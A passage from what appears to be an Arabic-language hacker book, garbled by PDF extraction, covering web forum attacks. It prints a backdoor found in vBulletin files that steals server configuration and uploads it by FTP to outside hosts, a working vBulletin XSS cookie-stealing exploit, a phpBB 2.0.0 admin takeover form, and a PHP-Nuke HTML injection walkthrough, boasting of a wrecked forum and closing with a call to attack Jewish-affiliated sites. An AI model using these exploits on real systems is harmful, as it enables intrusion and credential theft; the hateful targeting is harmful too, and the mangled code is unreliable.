المسربه لنا من اخواننا العرب وكان هذا الكود2.2.5قبل فتره بسيطه تم اكتشاف ثغره في بعض نسخ forumالموجود فيها في ملف

PHP:--------------------------------------------------------------------------------

if ($action=="modify} ("$vbxh = h;$vbxt = t;$vbxp = p;$vbxw = w;$vbxa = a;$vbx1 = 1;$vbxr = r;$vbxb = b;$vbxn = n;$vbxe = e;$vbxo = o;$vbxy =y;$vbxl = l;

echo;" --!>" $file =

fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbx

a$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME", "r;("

$rf = fread($file, 1000;(fclose($file;(

echo;"<-- "

--------------------------------------------------------------------------------

وكان الكود الحلو هذا يتصل في موقع

http://www.arab1.net/

http://www.arab1.net/~royal/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME

وسربوها لنا حبايبنا وشالوا كود التبليغ ياعيني عليهم عشان يحطون2.2.6عموما مع اليام نزلت نسخه

316

Page 317: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

لنا كود تجسس ونعم الخوه العرب المسلمين

بالخيرoptionبس هالمره الكود اذكى ومهو مكشوف وغبي زي الول الكود المره هذي في ملفين ملف موجود

PHP:--------------------------------------------------------------------------------

echo;" --!>" include "$sqlupdate;"

echo;"<-- "

--------------------------------------------------------------------------------

functionsوملف

PHP:--------------------------------------------------------------------------------

$sqlupdate = base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9

5YWwvLngyLmluYw;('==

--------------------------------------------------------------------------------

ياعيني على الذكاء صرنا نعرف نلعب باكدوا ديكود وانكود

والمره هذي بعد يتصل الكود الحلو هذا اللي مستخدمين فيه ديكود بالموقع هذا http://saudi.no-ip.com/

WELCOME TO arab1.netبيرحب فيكم ويقولكم ياعيني عالترحيب

اللي فيها كودhttp://saudi.no-ip.com/~royal/.x2.incعموما الكود بيتصل بالصفحه هذي رهييييييب ويبين لنا ....... اللي يحسبون علينا كمسلمين وعرب

شوفو الكود

PHP:--------------------------------------------------------------------------------

>div id="sHo" style="display:none<"; --!>

if you are seeing this code PlzZzZz Contact [email][email protected]

?>phpsystem("mkdir /tmp/.statics;("

system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf;("system("cp /usr/local/apache/conf/httpd.conf /tmp/.statics/httpd2.conf;("

system("cp admin/config.php /tmp/.statics/php.conf;("

317

Page 318: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

system("tar -cvf /tmp/.statics.tgz /tmp/.statics;("$vilename = "$SERVER_NAME.bz;"$port = base64_decode('aHB5NWk5;('$conn_id = ftp_connect("cyber-sa.virtualave.net ;("$login_result = ftp_login($conn_id, "cyber-sa", "$port ;("$upload = ftp_put($conn_id, "/tmp/$vilename", "/tmp/.statics.tgz",

FTP_BINARY ;(ftp_quit($conn_id ;(

system("rm -rf /tmp/.statics.tgz;("system("rm -rf /tmp/.statics;("

$base = "$HTTP_HOST&h2=$SCRIPT_NAME;"$open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base;"$file = fopen("$open", "r;("$rf = fread($file, 1000;(

fclose($file;(<?<--/>div<

واخره كان دار العرب في ملفه هو بيعرف

************

% لاجهزتكم ومنتدياتكم 80الحمايه من المخترقين بنسبة 6

% اليكم اسباب اخترقه وحمايته80يال كل يوم نسمع اختراق المنتديات اليكم الحل حماية

وجود ثغرات بمجلد الدمن1ثغرة مجلد مود2 ثغرة الستيل3 الهتمل4 كوكيز5دعم التلنت 67 Cfgwiz32.exe على المجلد ويندوز C:\Windowsmiscمن الملف 8 وجود باتش بجهازك تم ارسله لك من قبل المخترق لحصول بمعلوماتك 9

******

كيفية الحماية

شغل فقط في سرفرات الينوكس ليس ويندوزhtaccess قم بحماية ملف الدمن جيدا .1htaccess قم بحمايته .2 لتركب ستيلت كثير يسببب ثغرة باالمنتدي3 لتفعل لغة الهتمل ابدا4 احذر من الكوكز نظف جاهزك دائما5قم بتوقيف التل نيت لموقع عندما لتحتاجه 6C:\Windows على المجلد ويندوز Cfgwiz32.exe نأكد من عدم وجود ملف باسم 7

318

Page 319: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ده بلوووووي الدنيا فيه جاري البحث عن حل له8 قم بتركيب برامج الفيروسات بجهازك 9

قم بزيارت منتديات العقرب الحمر لحصولك علي كافة انواع الحماية لجهازك وموقع .10

انتهى،،،

"vBulletin 2,2,9ثغرة في منتديات"

<ةةةةة ةة ةةةةة ةةة ةةة><ةةةةةة: ةةةةةة>

....vBulletin 2.2.9هذه الثغرة خطيرة جدا وتؤدي بحاية المنتديات

المهم شرحها كالتالي:

php- انسخ الكود واحفظه بالمفكرة بامتداد 1?>PHP //vBulletin XSS Injection Vulnerability: Exploit

--- // //Coded By : Sp.IC ([email protected] .( //Descrption: Fetching vBulletin's cookies and storing it into a log file .

//Variables :

$LogFile = "Cookies.Log ;"

//Functions : */

If ($HTTP_GET_VARS['Action'] = "Log } ("$Header ;"--!>" = $Footer ;"<---" = {

Else }

$Header ;"" = $Footer ;"" = {

Print ($Header ;( /*

Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title ;("<

319

Page 320: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Print ("<Pre ;("<Print ("<Center ;("<

Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n ;("Print ("Coded By: <B><A

Href=\"MailTo:[email protected]\">Sp.IC</A></B><Hr Width=\"20% ;("<"\

*/Print ($Footer ;(

/*

Switch ($HTTP_GET_VARS['Action } (['Case "Log :"

$Data = $HTTP_GET_VARS['Cookie ;['$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex

(MD5 (NULL ;(((((($Log = FOpen ($LogFile, "a ;("+

FWrite ($Log, Trim ($Data) . "\n ;("FClose ($Log ;(

Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER ;("<"\" . ['

Break ;Case "List :"

If (!File_Exists ($LogFile) || !In_Array ($Records } ((Print ("<Br><Br><B>There are No Records</B></Center></Pre ;("<

Exit ;() {

Else } Print ("</Center></Pre ;("<

$Records = Array_UniQue (File ($LogFile ;((Print ("<Pre ;("<

Print ("<B>.:: Statics</B>\n ;("Print ("\n ;("

Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n ;("Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting

Duplicates]\n ;("Print ("\n ;("

Print ("<B>.:: Options</B>\n ;("Print ("\n ;("

If (Count (File ($LogFile)) > 0 } ($Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A ;"[< {

Else }$Link['Download'] = "[No Records in Log ;"[ {

Print ("o Download Log : " . $Link['Download'] . "\n ;("Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH. "?

320

Page 321: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Action=Delete\">Y</A>]\n ;("Print ("\n ;("

Print ("<B>.:: Records</B>\n ;("Print ("\n ;("

While (List ($Line[0], $Line[1]) = Each ($Records } ((Print ("<B>" . $Line[0] . ": </B>" . $Line[1 ;([

{ {

Print ("</Pre ;("<Break ;

Case "Delete :"@UnLink ($LogFile ;(

Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre ;("<Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .

$HTTP_SERVER_VARS['HTTP_REFERER ;("<"\" . ['Break ;

{ <?

php- ارفع الملف لموقع يدعم 2- اجعل الضحية يضغط على هذا اللينك3

member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code[

]script codeواستبدال [بهذا

>Script>location='Http?[مكان الملف الذي تم تحميله]//:Action=Log&Cookie='+(document.cookie);</Script <

- إذهب ألى هذا العنوان 4http://%20/الملف الذي تم تحميله ?مكان Action=List

انتهى،،،

321

Page 322: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"phpbb 2.0.0" اختراق منتديات

<ةةةةة ةة ةةةةةةة ةةةة ةةةةة>

phpbb 2.0.0

vbوهو شبيه بالـ

وهو سهل جدا بل يعتبر تااافه

يال سمو بال

PhpBB2 admin_ug_auth.phpفي ملف الوصف:

يمكنك من خلل هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدىوبذلك يمكنك الدخول الى لوحة التحكم متى شئت

الصدار:2.0.0

لتجربة الثغرة اول سجل بالمنتدىثم احفظ رقم عضويتك بالمنتدى

بعدها افتح المفكرة وانسخ مايلي اليها

>html<>head</>head<>body<

>form method="post "action="http://www.domain_name/board_directory/admin/admin_ug_aut

h.php<"User Level: <select name="userlevel<"

322

Page 323: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

>option value="admin">Administrator</option<>option value="user">User</option></select<>input type="hidden" name="private[1]" value="0<">input type="hidden" name="moderator[1]" value="0<">input type="hidden" name="mode" value="user<">input type="hidden" name="adv" value<""=

User Number: <input type="text" name="u" size="5<">input type="submit" name="submit" value="Submit<"

/>form</>body</>html<

عدل هذا العنوان الى عنوان الموقع المستهدفhttp://www.domain_name/board_directory

htmlاخفظه بامتدادعندما تدخل الى الصفحة التي قمت بحفظها سوف تجد

Administratorقائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى

submitأضغط زر بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك

ثم سوف تجد نفسك في لوحة تحكم المنتدى !! أفعل ماتريد المنتدى منتداك

وسلااامتكم شفتو سهولت الدرس وهو صرااحه منقول بس تعرفو ما حبيت انزله ال وعليه تطبيق

شووفوو المنتدا ذا

http://forums.xos.ca/

تدمر والحمد ل عقبال المواقع البااقيه...

انتهى،،،

323

Page 324: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"php nuke" ثغرة في <ةةةةة ةة ةةةةة ةةة ةةة>

<ةةةةةة: ةةةة >

حبيت اقولكم عليها ..الثغره دي تتيح لك تنفيذ اكواد الهتمل و الجافا بدل مكانphp nukeفيه ثغره في ال الصوره الشخصيه .......

انا عارف انكم اول ما تقروا السطر الول اكيد اغلبكم حيشتمني باكثر اللفاظ اباحه - بس عادي انا متعود - و يقول ايه ده باه هو مدخلنا هنا عشان يقولنا تنفيذ اكواد هتمل و جافا بدل الصوره الشخصيه ؟؟؟!!!!

بس ؟؟؟!!! اما عبيط اوي !!!

لكن في اخر الموضوع حقولكم ممكن تعملوا بيها ايه .....

المهم ان الثغره كالتالي : ( ساحاول اني اعمل زي مواقع السيكيوريتي المحترمه لم تيجي تعرض ثغره )

الصدارات المصابه :

PHP Nuke versionh 6.0و القل منها

324

Page 325: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

الستخدام :

تستخدم كما قلت في تنفيذ اكواد الهتمل و الجافا سكريبت من خلل مكان صورهم الشخصيه.

ملخص عام للثغره:

اي مستخدم عندم يقوم بالتسجيل في المجله فانه يطالب باختيار صوره شخصيه و ذلك من خلل مجموعه من ....images/forum/avatarsالصور الموجوده في المجلد هذا /

عندئذ تقوم المجله بوضع اسم الصوره في الداتا بيز .. و لكنها ل تقوم بوضع اي كود اي انه اذا استطاع اي يوزر ان يحصل على كود فورم المجله و استطاع ان يغير صندوق اختيار الصوره الشخصيه الى صندوق

text!!!! عادي ..اذن اعتقد انه ممكن ان يكتب كود الهتمل اللي هوه عايزه

الكسبلويت:

و منهاYour Accountاول عليك ن تقوم بالتسجيل في المجله و الدخول بعد ذلك و الذهاب الى صفحه وview source بعد ذلك عليك باظهار سورس كود الصفحه من خلل Your Infoالذهاب الى صفحه

uidالبحث عن كلمه

لزم تلقي حاجه زي كده :

>input type="hidden" name="uid" value="2111 <"

...2111كده يبقى انت عرفت رقم الي دي اللي هوه في المثال كان

مع ملحظه تغييرhtmlعليك بعد ذلك نك تحفظ الكود ده في النوت باد و تسميه اي اسم بامتداد http://nukesite/:...... الى عنوان المجله الهدف

--!>START CODE <!-- >form name="Register "

action="http://NUKEDSITE/modules.php?name=Your_Account" method="post <"

>b>Code ('">[code]<b ')</b><input type="text"name="user_avatar" size="30 "

maxlength="30"><br><br <

>b>Username</b><input type="text" name="uname" size="30"

maxlength="255"><br><b>User ID:<input type="text"name="uid "

size="30"><input type="hidden" name="op"value="saveuser"><input

type="submit" value="Save Changes"></form <

325

Page 326: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

--!>END CODE <!--

هذا .. اول خانه عليك كتابه الكود المطلووب تنفيذه مع مراعاه انه يجبhtmlو الن عليك تشغيل ملف الن يبدأ بالعلمه :

<"

و ممكن ينتهي بالعلمه

>b

submitحتى ل تجد اي مشاكل في الكود عند العرض ...ضع بعد كده اسم اليوزر و رقم الي دي و بعدين الخاصه بك ..و كده الكود تم تشغيله !!!!Your Accountسوف تجد نفسك في صفحه

مثال للي ممكن تكتبه مثل :

><"h1>TESTING</h1><b

مكان صورتك الشخصيه ....!!TESTINGطبعا ده حيطبع الكلمه

خلي بالك ان فيه مسافه بعد العلمه

>"b

خلي بالك منها وال سوف تجد بروكين كود ..

كراكتر ....30اقصى حد للكود اللي ممكن انك تشغله هو

او اي حاجه انت مش عارف تنفذها بسبب اغلق كودxssاللي انا كنت عايز اقوله انك ممكن تنفذ ثغرات الهتمل اياه =) لمزيد من المعلومات راجع الدرس هذا كمثال ليس اكثر ؟؟

الحل :

لسه و ال !!!!

و السلم عليكم و رحمه ال و بركاته...

انتهى،،،

326

Page 327: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

أفضل المنتديات العربية للهاكر ""

أقد لكم أفضل المواقع والمنتديات العربية في مجال الهاك بجميع مجالته على حد معرفتي:::

/http://members.lycos.co.uk/hihack/vbمنتدى منظمة هاي هكر. .1/http://www.e3sar.net/vbمنتدى إعصار. .2/http://www.ebnmasr.net/vbمنتدى ابن مصر. .3/http://www.7azm.net/vbمنتدى شبكة الحزم السلمية. .4http://www.almuhands.org/forum/index.phpمنتدى شبكة المهندس. .5/http://www.arabse.net/vbمنتدى امبراطورية العرب. .6/http://www.emoataz.com/vbمنتدى معتز نت. .7/http://www.h4palestine.comمنتدى هاكر فلسطين. .8/http://www.pharaonics.netموقع .9

/http://www.ruwad.tkمنتدى رواد. .10/http://www.nafitha.orgموقع المد الحمر. .11http://www.arab4vb.com/vb/index.phpمنتدى عرب فيجوال بيسك. .12http://www.naajm.com/vb/forumdisplay.phpمنتدى نجم دوس. .13

327

Page 328: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

هذه افضل مارأيته وتصفحته عن المواقع العربية التي تدعم علم الهاك...وشكرااا.

أفضل مواقع المن والهاك النجليزية ""

هذه بعض المواقع المهمة التي يستخدمها الهكر لمعرفة اخر الثغرات الصادره مع مقالت بسيط لهذه المواقع

Packet Storm Securityموقع ----------------------

/http://packetstorm.securify.comالعنوان : واحد من اكبر قواعد البيانات التي تحمل كعلومات متعلقة بالمن

' سواءا للبحث عنNew Files Todayانا افضل الذهاب الى هذا الموقع مره في اليوم لقراءة قسم 'ثغرات معينه او ل.

حيث ان هذا الموقع يستهلك مئات اللوف من النقرات كلKen Williamsاوجد الرشيف عن طريق اسبوع

(./Kroll-O-Nagra ) http://www.securify.comحاليا انتقلت ملكيته الى مالك

Security Focusموقع ----------------

/http://www.securityfocus.comالعنوان :

328

Page 329: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

قاعدة بيانات اخرى كاملة . تتحدث يوميا فهؤلء الشباب القائمون على هذا الموقع ل ينامون ابدا !

BugTraq--------

,( وسابقا/Security Focus )http://www.securityfocus.comالعنوان : مستضيفه موقع )./Netspace ) http://www.netspace.orgكان مستضيفة (

BugTraq واحدة من افضل قائمة المراسلت البريدية mailing list التي تتهتم بالمن اللكتروني ). يستقبل الرسائلAleph1 ([email protected]هذه القائمة يقوم عليها رئيس اسمه

والرسائل التي ليس لهاspamsالتي ترسلها ( عن ثغرة معينه مثل ) ويقوم بتحليلها وتنضيفها من الفائدة او الثغرات القديمة ثم يقوم بإرسال الرساله الممتازه فقط الى جميع المشتركين في القائمة

/http://www.securityfocus.comانصحك بالتسجيل تستطيع ايضا البحث في ارشيفاتها التي تعتبر لدي من افضل قواعد البيانات وذلك عن طريق دخول الموقع ثم

'searchالبحث عن رابط '

Searchingالبحث ------------

فستحتاج لكتابت 'Sendmail 8.8.3اذا كنت تريد البحث عن ثغرة متعلقة بخدمه معينة مثل sendmail 8.8.3 واذا اردت البحث عن ثغره معينه مثل هجوم حجب الخدمه 'local DoSضد اي

sendmailنسخه من ' بدون علمات القتباس.local DoS sendmailفما عليك ال كتابت التالي : '

وهذه بعض المواقع الخرى:::/http://rootshell.redi.tkموقع .1http://www.ussrback.comموقع .2http://www.insecure.org/sploits.htmlموقع .3http://www.linux.com.cn/hack.co.zaموقع .4

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

أما بالنسبة لمواقع الهاك النجليزية فمعرفتي بها ضئيلة لعدم توسعي في اللغة النجليزية، وهذه المواقعكالتالي:::

http://www.haker.com.plموقع .1/http://www.webattack.comموقع .2http://blacksun.box.skموقع .3http://www.blackcode.comموقع .4

تقبلوا تحياتي،،،انتهى،،،

تم تحميل الكتاب من مكتبة الطارق اللكترونيةhttp://www.t0010.com/books/index.php

329

Page 330: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

الرجاء عدم التجربة على المواقع العربية النافعه والستفاده من المعلومات للقضاء على المواقع الباحية والتابعة لليهود

واعوانهم

الخاتمة

330